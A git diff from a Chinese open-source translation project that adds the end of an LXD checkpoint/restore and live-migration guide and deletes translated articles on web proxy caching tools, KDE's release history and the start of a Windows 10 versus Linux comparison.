+├── core-126.img
+├── core-127.img
+├── core-183.img
+├── core-1.img
+├── core-245.img
+├── core-246.img
+├── core-50.img
+├── core-52.img
+├── core-95.img
+├── core-96.img
+├── core-97.img
+├── core-98.img
+├── dump.log
+├── eventfd.img
+├── eventpoll.img
+├── fdinfo-10.img
+├── fdinfo-11.img
+├── fdinfo-12.img
+├── fdinfo-13.img
+├── fdinfo-14.img
+├── fdinfo-2.img
+├── fdinfo-3.img
+├── fdinfo-4.img
+├── fdinfo-5.img
+├── fdinfo-6.img
+├── fdinfo-7.img
+├── fdinfo-8.img
+├── fdinfo-9.img
+├── fifo-data.img
+├── fifo.img
+├── filelocks.img
+├── fs-101.img
+├── fs-113.img
+├── fs-122.img
+├── fs-183.img
+├── fs-1.img
+├── fs-245.img
+├── fs-246.img
+├── fs-50.img
+├── fs-52.img
+├── fs-95.img
+├── fs-96.img
+├── fs-97.img
+├── fs-98.img
+├── ids-101.img
+├── ids-113.img
+├── ids-122.img
+├── ids-183.img
+├── ids-1.img
+├── ids-245.img
+├── ids-246.img
+├── ids-50.img
+├── ids-52.img
+├── ids-95.img
+├── ids-96.img
+├── ids-97.img
+├── ids-98.img
+├── ifaddr-9.img
+├── inetsk.img
+├── inotify.img
+├── inventory.img
+├── ip6tables-9.img
+├── ipcns-var-10.img
+├── iptables-9.img
+├── mm-101.img
+├── mm-113.img
+├── mm-122.img
+├── mm-183.img
+├── mm-1.img
+├── mm-245.img
+├── mm-246.img
+├── mm-50.img
+├── mm-52.img
+├── mm-95.img
+├── mm-96.img
+├── mm-97.img
+├── mm-98.img
+├── mountpoints-12.img
+├── netdev-9.img
+├── netlinksk.img
+├── netns-9.img
+├── netns-ct-9.img
+├── netns-exp-9.img
+├── packetsk.img
+├── pagemap-101.img
+├── pagemap-113.img
+├── pagemap-122.img
+├── pagemap-183.img
+├── pagemap-1.img
+├── pagemap-245.img
+├── pagemap-246.img
+├── pagemap-50.img
+├── pagemap-52.img
+├── pagemap-95.img
+├── pagemap-96.img
+├── pagemap-97.img
+├── pagemap-98.img
+├── pages-10.img
+├── pages-11.img
+├── pages-12.img
+├── pages-13.img
+├── pages-1.img
+├── pages-2.img
+├── pages-3.img
+├── pages-4.img
+├── pages-5.img
+├── pages-6.img
+├── pages-7.img
+├── pages-8.img
+├── pages-9.img
+├── pipes-data.img
+├── pipes.img
+├── pstree.img
+├── reg-files.img
+├── remap-fpath.img
+├── route6-9.img
+├── route-9.img
+├── rule-9.img
+├── seccomp.img
+├── sigacts-101.img
+├── sigacts-113.img
+├── sigacts-122.img
+├── sigacts-183.img
+├── sigacts-1.img
+├── sigacts-245.img
+├── sigacts-246.img
+├── sigacts-50.img
+├── sigacts-52.img
+├── sigacts-95.img
+├── sigacts-96.img
+├── sigacts-97.img
+├── sigacts-98.img
+├── signalfd.img
+├── stats-dump
+├── timerfd.img
+├── tmpfs-dev-104.tar.gz.img
+├── tmpfs-dev-109.tar.gz.img
+├── tmpfs-dev-110.tar.gz.img
+├── tmpfs-dev-112.tar.gz.img
+├── tmpfs-dev-114.tar.gz.img
+├── tty.info
+├── unixsk.img
+├── userns-13.img
+└── utsns-11.img
+
+0 directories, 154 files
+```
+
+Restoring the container can be done with a simple:
+
+```
+stgraber@dakara:~$ lxc start c1
+```
+
+### Live migration
+
+Live migration is basically the same as the stateful stop/start above, except that the container directory and configuration happens to be moved to another machine too.
+
+```
+stgraber@dakara:~$ lxc list c1
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2 |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+
+stgraber@dakara:~$ lxc list s-tollana:
++------+-------+------+------+------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+-------+------+------+------+-----------+
+
+stgraber@dakara:~$ lxc move c1 s-tollana:
+
+stgraber@dakara:~$ lxc list c1
++------+-------+------+------+------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+-------+------+------+------+-----------+
+
+stgraber@dakara:~$ lxc list s-tollana:
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| NAME | STATE | IPV4 | IPV6 | TYPE | SNAPSHOTS |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+| c1 | RUNNING | 10.178.150.197 (eth0) | 2001:470:b368:4242:216:3eff:fe19:27b0 (eth0) | PERSISTENT | 2 |
++------+---------+-----------------------+----------------------------------------------+------------+-----------+
+```
+
+### Limitations
+
+As I said before, checkpoint/restore of containers is still pretty new and we’re still very much working on this feature, fixing issues as we are made aware of them. We do need more people trying this feature and sending us feedback, I would however not recommend using this in production just yet.
+
+The current list of issues we’re tracking is [available on Launchpad][1].
+
+We expect a basic Ubuntu container with a few services to work properly with CRIU in Ubuntu 16.04. However more complex containers, using device passthrough, complex network services or special storage configurations are likely to fail.
+
+Whenever possible, CRIU will fail at dump time, rather than at restore time. In such cases, the source container will keep running, the snapshot or migration will simply fail and a log file will be generated for debugging.
+
+In rare cases, CRIU fails to restore the container, in which case the source container will still be around but will be stopped and will have to be manually restarted.
+
+### Sending bug reports
+
+We’re tracking bugs related to checkpoint/restore against the CRIU Ubuntu package on Launchpad. Most of the work to fix those bugs will then happen upstream either on CRIU itself or the Linux kernel, but it’s easier for us to track things this way.
+
+To file a new bug report, head here.
+
+Please make sure to include:
+
+The command you ran and the error message as displayed to you
+
+- Output of “lxc info” (*)
+- Output of “lxc info ”
+- Output of “lxc config show –expanded ”
+- Output of “dmesg” (*)
+- Output of “/proc/self/mountinfo” (*)
+- Output of “lxc exec — cat /proc/self/mountinfo”
+- Output of “uname -a” (*)
+- The content of /var/log/lxd.log (*)
+- The content of /etc/default/lxd-bridge (*)
+- A tarball of /var/log/lxd// (*)
+
+If reporting a migration bug as opposed to a stateful snapshot or stateful stop bug, please include the data for both the source and target for any of the above which has been marked with a (*).
+
+### Extra information
+
+The CRIU website can be found at:
+
+The main LXD website is at:
+
+Development happens on Github at:
+
+Mailing-list support happens on:
+
+IRC support happens in: #lxcontainers on irc.freenode.net
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.stgraber.org/2016/03/19/lxd-2-0-your-first-lxd-container-312/
+
+作者:[Stéphane Graber][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: https://www.stgraber.org/author/stgraber/
+[0]: https://www.stgraber.org/2016/03/11/lxd-2-0-blog-post-series-012/
+[1]: https://bugs.launchpad.net/ubuntu/+source/criu/+bugs
+[3]: https://launchpad.net/ubuntu/+source/criu/+filebug?no-redirect
diff --git a/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md b/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md
deleted file mode 100644
index 21fd8ad8e2..0000000000
--- a/translated/share/20151104 Optimize Web Delivery with these Open Source Tools.md
+++ /dev/null
@@ -1,195 +0,0 @@
-使用开源工具优化Web响应
-================================================================================
-Web代理软件转发HTTP请求时并不会改变数据流量。它们经过配置后,可以免客户端配置,作为透明代理。它们还可以作为网站反向代理的前端;缓存服务器在此能支撑一台或多台web服务器为海量用户提供服务。
-
-网站代理功能多样,有着宽泛的用途:从页面缓存、DNS和其他查询,到加速web服务器响应、降低带宽消耗。代理软件广泛用于大型高访问量的网站,比如纽约时报、卫报, 以及社交媒体网站如Twitter、Facebook和Wikipedia。
-
-页面缓存已经成为优化单位时间内所能吞吐的数据量的至关重要的机制。好的Web缓存还能降低延迟,尽可能快地响应页面,让终端用户不至于因等待内容的时间过久而失去耐心。它们还能将频繁访问的内容缓存起来以节省带宽。如果你需要降低服务器负载并改善网站内容响应速度,那缓存软件能带来的好处就绝对值得探索一番。
-
-为深入探查Linux下可用的相关软件的质量,我列出了下边5个优秀的开源web代理工具。它们中有些功能完备强大,也有几个只需很低的资源就能运行。
-
-### Squid ###
-
-Squid是一个高性能、开源的代理缓存和Web缓存服务器,支持FTP、Internet Gopher、HTTPS和SSL等多种协议。它通过一个非阻塞,I/O事件驱动的单一进程处理所有IPV4或IPV6上的请求。
-
-Squid由一个主服务程序squid,和DNS查询程序dnsserver,另外还有可选的请求重写、执行认证程序组件,及一些管理和客户端工具构成。
-
-Squid提供了丰富的访问控制、认证和日志环境, 用于开发web代理和内容服务网站应用。
-
-其特性包括:
-
-- Web代理:
- - 通过缓存来降低访问时间和带宽使用
- - 将元数据和特别热的对象缓存到内存中
- - 缓存DNS查询
- - 支持非阻塞的DNS查询
- - 实现了失败请求的未果缓存
-- Squid缓存可架设为层次结构,或网状结构以节省额外的带宽
-- 通过可扩展的访问控制来执行网站使用条款
-- 隐匿请求,如禁用或修改客户端HTTP请求头特定属性
-- 反向代理
-- 媒体范围限制
-- 支持SSL
-- 支持IPv6
-- 错误页面的本地化 - Squid可以根据访问者的语言选项对每个请求展示本地化的错误页面
-- 连接Pinning(用于NTLM Auth Passthrough) - 一种通过Web代理,允许Web服务器使用Microsoft NTLM安全认证替代HTTP标准认证的方案
-- 支持服务质量 (QoS, Quality of Service) 流
- - 选择一个TOS/Diffserv值来标记本地命中
- - 选择一个TOS/Diffserv值来标记邻居命中
- - 选择性地仅标记同级或上级请求
- - 允许任意发往客户端的HTTP响应保持由远程服务器处响应的TOS值
- - 对收到的远程服务器的TOS值,在复制之前对指定位进行掩码操作,再发送到客户端
-- SSL Bump (用于HTTPS过滤和适配) - Squid-in-the-middle,在CONNECT方式的SSL隧道中,用配置化的客户端和服务器端证书,对流量进行解密和加密
-- 支持适配模块
-- ICAP旁路和重试增强 - 通过完全的旁路和动态链式路由扩展ICAP,来处理多多个适应性服务。
-- 支持ICY流式协议 - 俗称SHOUTcast多媒体流
-- 动态SSL证书生产
-- 支持ICAP协议(Internet Content Adaptation Protocol)
-- 完整的请求日志记录
-- 匿名连接
-
-- 网站: [www.squid-cache.org][1]
-- 开发: 美国国家应用网络研究实验室和网络志愿者
-- 授权: GNU GPL v2
-- 版本号: 4.0.1
-
-### Privoxy ###
-
-Privoxy(Privacy Enhancing Proxy)是一个非缓存类Web代理软件,它自带的高级过滤功能用来增强隐私保护,修改页面内容和HTTP头部信息,访问控制,以及去除广告和其它招人反感的互联网垃圾。Privoxy的配置非常灵活,能充分定制已满足各种各样的需求和偏好。它支持单机和多用户网络两种模式。
-
-Privoxy使用Actions规则来处理浏览器和远程站点间的数据流。
-
-其特性包括:
-
-- 高度配置化
-- 广告拦截
-- Cookie管理
-- 支持"Connection: keep-alive"。可以无视客户端配置而保持持久连接
-- 支持IPv6
-- 标签化,允许按照客户端和服务器的请求头进行处理
-- 作为拦截代理器运行
-- 巧妙的手段和过滤机制用来处理服务器和客户端的HTTP头部
-- 可以与其他代理软件链式使用
-- 整合了基于浏览器的配置和控制工具,能在线跟踪规则和过滤效果,可远程开关
-- 页面过滤(文本替换、根据尺寸大小删除广告栏, 隐藏的"web-bugs"元素和HTML容错等)
-- 模块化的配置使得标准配合和用户配置可以存放于不同文件中,这样安装更新就不会覆盖用户的个性化设置
-- 配置文件支持Perl兼容的正则表达式,以及更为精妙和灵活的配置语法
-- GIF去动画
-- 旁路处理大量click-tracking脚本(避免脚本重定向)
-- 大多数代理生成的页面(例如 "访问受限" 页面)可由用户自定义HTML模板
-- 自动监测配置文件的修改并重新读取
-- 最大特点是可以基于每个站点或每个位置来进行控制
-
-- 网站: [www.privoxy.org][2]
-- 开发: Fabian Keil(开发领导者), David Schmidt, 和众多其他贡献者
-- 授权: GNU GPL v2
-- 版本号: 3.4.2
-
-### Varnish Cache ###
-
-Varnish Cache是一个为性能和灵活性而生的web加速器。它新颖的架构设计能带来显著的性能提升。根据你的架构,通常情况下它能加速响应速度300-1000倍。Varnish将页面存储到内存,这样web服务器就无需重复地创建相同的页面,只需要在页面发生变化后重新生成。页面内容直接从内存中访问,当然比其他方式更快。
-
-此外Varnish能大大提升响应web页面的速度,用任何应用服务器都能使网站访问速度大幅度地提升。
-
-按按经验,Varnish Cache比较经济的配置是1-16GB内存+SSD固态硬盘。
-
-其特性包括:
-
-- 新颖的设计
-- VCL - 非常灵活的配置语言。VCL配置转换成C,然后编译、加载、运行,灵活且高效
-- 能使用round-robin轮询和随机分发两种方式来负载均衡,两种方式下后端服务器都可以设置权重
-- 基于DNS、随机、散列和客户端IP的分发器
-- 多台后端主机间的负载均衡
-- 支持Edge Side Includes,包括拼装压缩后的ESI片段
-- 多线程并发
-- URL重写
-- 单Varnish缓存多个虚拟主机
-- 日志数据存储在共享内存中
-- 基本的后端服务器健康检查
-- 优雅地处理后端服务器“挂掉”
-- 命令行界面的管理控制台
-- 使用内联C来扩展Varnish
-- 可以与Apache用在相同的系统上
-- 单系统可运行多个Varnish
-- 支持HAProxy代理协议。该协议在每个收到的TCP请求,例如SSL终止过程中,附加小段头信息,以记录客户端的真实地址
-- 冷热VCL状态
-- 用名为VMODs的Varnish模块来提供插件扩展
-- 通过VMODs定义后端主机
-- Gzip压缩及解压
-- HTTP流通过和获取
-- 神圣模式和优雅模式。用Varnish作为负载均衡器,神圣模式下可以将不稳定的后端服务器在一段时间内打入黑名单,阻止它们继续提供流量服务。优雅模式允许Varnish在获取不到后端服务器状态良好的响应时,提供已过期版本的页面或其它内容。
-- 实验性支持持久化存储,无需LRU缓存淘汰
-
-- 网站: [www.varnish-cache.org][3]
-- 开发: Varnish Software
-- 授权: FreeBSD
-- 版本号: 4.1.0
-
-### Polipo ###
-
-Polipo是一个开源的HTTP缓存代理,只需要非常低的资源开销。
-
-它监听来自浏览器的web页面请求,转发到web服务器,然后将服务器的响应转发到浏览器。在此过程中,它能优化和整形网络流量。从本质来讲Polipo与WWWOFFLE很相似,但其实现技术更接近于Squid。
-
-Polipo最开始的目标是作为一个兼容HTTP/1.1的代理,理论它能在任何兼容HTTP/1.1或更早的HTTP/1.0的站点上运行。
-
-其特性包括:
-
-- HTTP 1.1、IPv4 & IPv6、流量过滤和隐私保护增强
-- 如确认远程服务器支持,则无论收到的请求是管道处理过的还是在多个连接上同时收到的,都使用HTTP/1.1管道
-- 下载被中断时缓存起始部分,当需要续传时用区间请求来完成下载
-- 将HTTP/1.0的客户端请求升级为HTTP/1.1,然后按照客户端支持的级别进行升级或降级后回复
-- 全面支持IPv6 (作用域(链路本地)地址除外)
-- 作为IPv4和IPv6网络的网桥
-- 内容过滤
-- 能使用Poor Man多路复用技术降低延迟
-- 支持SOCKS 4和SOCKS 5协议
-- HTTPS代理
-- 扮演透明代理的角色
-- 可以与Privoxy或tor一起运行
-
-- 网站: [www.pps.univ-paris-diderot.fr/~jch/software/polipo/][4]
-- 开发: Juliusz Chroboczek, Christopher Davis
-- 授权: MIT License
-- 版本号: 1.1.1
-
-### Tinyproxy ###
-
-Tinyproxy是一个轻量级的开源web代理守护进程,其设计目标是快而小。它适用于需要完整HTTP代理特性,但系统资源又不足以运行大型代理的场景,比如嵌入式部署。
-
-Tinyproxy对小规模网络非常有用,这样的场合下大型代理会使系统资源紧张,或有安全风险。Tinyproxy的一个关键特性是其缓冲连接的理念。实质上Tinyproxy服务器的响应进行了高速缓冲,然后按照客户端能够处理的最高速度进行响应。该特性极大的降低了网络延滞带来的问题。
-
-特性:
-
-- 易于修改
-- 隐匿模式 - 定义哪些HTTP头允许通过,哪些又会被拦截
-- 支持HTTPS - Tinyproxy允许通过CONNECT方法转发HTTPS连接,任何情况下都不会修改数据流量
-- 远程监控 - 远程访问代理统计数据,让你能清楚了解代理服务当前的忙碌状态
-- 平均负载监控 - 通过配置,当服务器的负载接近一定值后拒绝新连接
-- 访问控制 - 通过配置,仅允许指定子网或IP地址的访问
-- 安全 - 运行无需额外权限,减小了系统受到威胁的概率
-- 基于URL的过滤 - 允许基于域和URL的黑白名单
-- 透明代理 - 配位为透明代理,这样客户端就无需任何配置
-- 代理链 - 来流量出口处采用上游代理服务器,而不是直接转发到目标服务器,创建我们所说的代理链
-- 隐私特性 - 限制允许从浏览器收到的来自HTTP服务器的数据(例如cookies),同时限制允许通过的从浏览器到HTTP服务器的数据(例如版本信息)
-- 低开销 - 使用glibc内存开销只有2MB,CPU负载按并发连接数线性增长(取决于网络连接速度)。 Tinyproxy可以运行在老旧的机器上而无需担心性能问题。
-
-- 网站: [banu.com/tinyproxy][5]
-- 开发: Robert James Kaes和其他贡献者
-- 授权: GNU GPL v2
-- 版本号: 1.8.3
-
---------------------------------------------------------------------------------
-
-via: http://www.linuxlinks.com/article/20151101020309690/WebDelivery.html
-
-译者:[fw8899](https://github.com/fw8899)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]:http://www.squid-cache.org/
-[2]:http://www.privoxy.org/
-[3]:https://www.varnish-cache.org/
-[4]:http://www.pps.univ-paris-diderot.fr/%7Ejch/software/polipo/
-[5]:https://banu.com/tinyproxy/
diff --git a/translated/talk/20101020 19 Years of KDE History--Step by Step.md b/translated/talk/20101020 19 Years of KDE History--Step by Step.md
deleted file mode 100644
index ef90acd91f..0000000000
--- a/translated/talk/20101020 19 Years of KDE History--Step by Step.md
+++ /dev/null
@@ -1,209 +0,0 @@
-# 19年KDE进化历程
-注:youtube 视频
-
-
-## 概述
-KDE – 史上功能最强大的桌面环境之一; 开源且免费。19年前,1996年10月14日,德国程序员 Matthias Ettrich 开始了编写这个美观的桌面环境。KDE提供了诸如shell以及其他很多日常使用的程序。今日,KDE被成千上万人在 Unix 和 Windows 上使用。19年----一个对软件项目而言极为漫长的年岁。现在是时候让我们回到最初,看看这一切从哪里开始了。
-
-K Desktop Environment(KDE)有很多创新之处:新设计,美观,连贯性,易于使用,对普通用户和专业用户都足够强大的应用库。"KDE"这个名字是对单词"通用桌面环境"(Common Desktop Environment)玩的一个简单谐音游戏,"K"----"Cool"。 第一代KDE在双证书授权下使用了有专利的 Trolltech's Qt 框架 (现Qt的前身),这两个许可证分别是 open source QPL(Q public license) 和 商业专利许可证(proprietary commercial license)。在2000年 Trolltech 让一部分 Qt 软件库开始发布在 GPL 证书下; Qt 4.5 发布在了 LGPL 2.1 许可证下。自2009起 KDE 桌面环境由三部分构成:Plasma Workspaces (作Shell),KDE 应用,作为 KDE Software 编译的 KDE Platform.
-
-## 各发布版本
-### Pre-Release – 1996年10月14日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/0b3.png)
-
-当时名称为 Kool Desktop Environment;"Kool"这个单词在很快就被弃用了。最初,所有KDE的组件都是被单独发布在开发社区里的,他们之间没有任何环绕大项目的组装配合。开发组邮件列表中的第一封通信是发往kde@fiwi02.wiwi.uni-Tubingen.de 的邮件。
-
-### KDE 1.0 – 1998年7月12日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/10.png)
-
-这个版本受到了颇有争议的反馈。很多人反对使用Qt框架----当时的 FreeQt 许可证和自由软件许可证并不兼容----并建议开发组使用 Motif 或者 LessTif 替代。尽管有着这些反对声,KDE 仍然被很多用户所青睐,并且成功作为第一个Linux发行版的环境被集成了进去。(made its way into the first Linux distributions)
-
-![28 January 1999](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/11.png)
-
-1999年1月28日
-
-一次升级,**K Desktop Environment 1.1**,更快,更稳定的同时加入了很多小升级。这个版本同时也加入了很多新的图标,背景,外观文理。和这些全面翻新同时出现的还有 Torsten Rahn 绘制的全新KDE图标----齿轮前的3个K字母;这个图标的修改版也一直沿用至今。
-
-### KDE 2.0 – 2000年10月23日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/20.png)
-
-重大更新:_ DCOP (Desktop COmmunication Protocol),一个端到端的通信协议 _ KIO,一个应用程序I/O库 _ KParts,组件对象模板 _ KHTML,一个符合 HTML 4.0 标准的图像绘制引擎。
-
-![26 February 2001](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/21.png)
-
-2001年2月26日
-
-**K Desktop Environment 2.1** 首次发布了媒体播放器 noatun,noatun使用了先进的模组-插件设计。为了便利开发者,K Desktop Environment 2.1 打包了 KDevelop
-
-![15 August 2001](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/22.png)
-
-2001年8月15日
-
-**KDE 2.2**版本在GNU/Linux上加快了50%的应用启动速度,同时提高了稳定性和 HTML、JavaScript的解析性能,同时还增加了一些 KMail 的功能。
-
-### KDE 3.0 – 2002年4月3日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/30.png)
-
-K Desktop Environment 3.0 加入了更好的限制使用功能,这个功能在网咖,企业公用电脑上被广泛需求。
-
-![28 January 2003](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/31.png)
-
-2003年1月28日
-
-**K Desktop Environment 3.1** 加入了新的默认窗口(Keramik)和图标样式(Crystal)和其他一些改进。
-
-![3 February 2004](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/32.png)
-
-2004年2月3日
-
-**K Desktop Environment 3.2** 加入了诸如网页表格,书写邮件中拼写检查的新功能;补强了邮件和日历功能。完善了Konqueror 中的标签机制和对 Microsoft Windows 桌面共享协议的支持。
-
-![19 August 2004](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/33.png)
-
-2004年8月19日
-
-**K Desktop Environment 3.3** 侧重于组合不同的桌面组件。Kontact 被放进了群件应用Kolab 并与 Kpilot 结合。Konqueror 的加入让KDE有了更好的 IM 交流功能,比如支持发送文件,以及其他 IM 协议(如IRC)的支持。
-
-![16 March 2005](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/34.png)
-
-2005年3月16日
-
-**K Desktop Environment 3.4** 侧重于提高易用性。这次更新为Konqueror,Kate,KPDF加入了文字-语音转换功能;也在桌面系统中加入了独立的 KSayIt 文字-语音转换软件。
-
-![29 November 2005](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/35.png)
-
-2005年11月29日
-
-**The K Desktop Environment 3.5** 发布加入了 SuperKaramba,为桌面环境提供了易于安装的插件机制。 desktop. Konqueror 加入了广告屏蔽功能并成为了有史以来第二个通过Acid2 CSS 测试的浏览器。
-
-### KDE SC 4.0 – 2008年1月11日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/400.png)
-
-大部分开组投身于把最新的技术和开发框架整合进 KDE 4 当中。Plasma 和 Oxygen 是两次最大的用户界面风格变更。同时,Dolphin 替代 Konqueror 成为默认文件管理器,Okular 成为了默认文档浏览器。
-
-![29 July 2008](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/401.png)
-
-2008年7月29日
-
-**KDE 4.1** 引入了一个在 PIM 和 Kopete 中使用的表情主题系统;引入了可以让用户便利地从互联网上一键下载数据的DXS。同时引入了 GStreamer,QuickTime,和 DirectShow 9 Phonon 后台。加入了新应用如:_ Dragon Player _ Kontact _ Skanlite – 扫描仪软件,_ Step – 物理模拟软件 * 新游戏: Kdiamond,Kollision,KBreakout 和更多......
-
-![27 January 2009](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/402.png)
-
-2009年1月27日
-
-**KDE 4.2** 被认为是在已经极佳的 KDE 4.1 基础上的又一次全面超越,同时也成为了大多数用户替换旧 3.5 版本的完美选择。
-
-![4 August 2009](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/403.png)
-
-2009年8月4日
-
-**KDE 4.3** 修复了超过10,000个 bugs,同时加入了让近2,000个被用户需求的功能。整合一些新的技术例如:PolicyKit,NetworkManage & Geolocation services 等也是这个版本的一大重点。
-
-![9 February 2010](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/404.png)
-
-2010年2月9日
-
-**KDE SC 4.4** 基础 Qt 4 开框架的 4.6 版本,新的应用 KAddressBook 被加入,同时也是is based on version 4.6 of the Qt 4 toolkit. New application – KAddressBook,Kopete首次发布。
-
-![10 August 2010](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/405.png)
-
-2010年8月10日
-
-**KDE SC 4.5** 增加了一些新特性:整合了 WebKit 库----一个开源的浏览器引擎库,现在也被在 Apple Safari 和 Google Chrome 中广泛使用。KPackageKit 替换了 Kpackage。
-
-![26 January 2011](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/406.png)
-
-2011年1月26日
-
-**KDE SC 4.6** 加强了 OpenGl 的性能,同时照常更新了无数bug和小改进。
-
-![27 July 2011](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/407.png)
-
-2011年7月27日
-
-**KDE SC 4.7** 升级 KWin 以兼容 OpenGL ES 2.0 ,更新了 Qt Quick,Plasma Desktop 中在应用里普遍使用的新特性 1.2万个bug被修复。
-
-![25 January 2012](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/408.png)
-
-2012年1月25日
-
-**KDE SC 4.8**: 更好的 KWin 性能与 Wayland 支持,更新了 Doplhin 的外观设计。
-
-![1 August 2012](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/409.png)
-
-2012年8月1日
-
-**KDE SC 4.9**: 向 Dolphin 文件管理器增加了一些更新,比如加入了实时文件重命名,鼠标辅助按钮支持,更好的位置标签和更多文件分类管理功能。
-
-![6 February 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/410.png)
-
-2013年2月6日
-
-**KDE SC 4.10**: 很多 Plasma 插件使用 QML 重写; Nepomuk,Kontact 和 Okular 得到了很大程度的性能和功能提升。
-
-![14 August 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/411.png)
-
-2013年8月14日
-
-**KDE SC 4.11**: Kontact 和 Nepomuk 有了很大的优化。 第一代 Plasma Workspaces 进入了仅有维护而没有新生开发的软件周期。
-
-![18 December 2013](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/412.png)
-
-2013年12月18日
-
-**KDE SC 4.12**: Kontact 得到了极大的提升。
-
-![16 April 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/413.png)
-
-2014年4月16日
-
-**KDE SC 4.13**: Nepomuk 语义搜索功能替代了桌面上的原有的Baloo搜索。 KDE SC 4.13 发布了53个语言版本。
-
-![20 August 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/414.png)
-
-2014年8月20日
-
-**KDE SC 4.14**: 这个发布版本侧重于稳定性提升:大量的bug修复和小更新。这是最后一个 KDE SC 4 发布版本。
-
-### KDE Plasma 5.0 – 2014年7月15日
-![](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/500.png)
-
-KDE Plasma 5 – 第五代 KDE。大幅改进了设计和系统,新的默认主题 ---- Breeze,完全迁移到了 QML,更好的 OpenGL 性能,更完美的 HiDPI (高分辨率)显示支持。
-
-![11 November 2014](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/501.png)
-
-2014年11月11日
-
-**KDE Plasma 5.1**:加入了Plasma 4里原先没有补完的功能。
-
-![27 January 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/502.png)
-
-2015年1月27日
-
-**KDE Plasma 5.2**:新组件:BlueDevil,KSSHAskPass,Muon,SDDM 主题设置,KScreen,GTK+ 样式设置 和 KDecoration.
-
-![28 April 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/503.png)
-
-2015年4月28日
-
-**KDE Plasma 5.3**:Plasma Media Center 技术预览。新的蓝牙和触摸板小程序;改良了电源管理。
-
-![25 August 2015](https://github.com/paulcarroty/Articles/raw/master/KDE_History/im/504.png)
-
-2015年8月25日
-
-**KDE Plasma 5.4**:Wayland 登场,新的基于 QML 的音频管理程序,交替式全屏程序显示。
-
-万分感谢 [KDE][1] 开发者和社区及Wikipedia 为书写 [概述][2] 带来的帮助,同时,感谢所有读者。希望大家保持自由精神(be free)并继续支持如同 KDE 一样的开源的自由软件发展。
-
---------------------------------------------------------------------------------
-
-via: [https://tlhp.cf/kde-history/](https://tlhp.cf/kde-history/)
-
-作者:[Pavlo RudyiCategories][a] 译者:[jerryling315](https://github.com/jerryling315) 校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[1]: https://www.kde.org/
-[2]: https://en.wikipedia.org/wiki/KDE_Plasma_5
-[a]: https://tlhp.cf/author/paul/
diff --git a/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md b/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md
deleted file mode 100644
index 6f821f777d..0000000000
--- a/translated/talk/20150818 A Linux User Using Windows 10 After More than 8 Years--See Comparison.md
+++ /dev/null
@@ -1,344 +0,0 @@
-对比Windows 10与Linux:Linux用户已经使用'Windows 10'超过8年
-==============================================================================================================================================================
-Windows 10 是2015年7月29日上市的最新一代Windows NT系列系统,Windows 8.1 的继任者.Windows 10 支持Intel 32位平台,AMD64以及ARM v7处理器.
-
-![Windows 10 and Linux Comparison](http://www.tecmint.com/wp-content/uploads/2015/08/Windows-10-vs-Linux.jpg)
-
-对比:Windows 10与Linux
-
-作为一个连续使用linux超过8年的用户,我想要去测试Windows 10 ,因为它最近制造了很多新闻.这篇文章是我观察力的一个重大突破.我将从一个linux用户的角度去看待一切,所以这篇文章可能会有些偏向于linux.尽管如此,本文也应该不会有任何错误信息.
-
-1. 用谷歌搜索"download Windows 10" 并且点击第一个链接.
-
-![Search Windows 10](http://www.tecmint.com/wp-content/uploads/2015/08/Search-Windows-10.jpg)
-
-搜索Windows 10
-
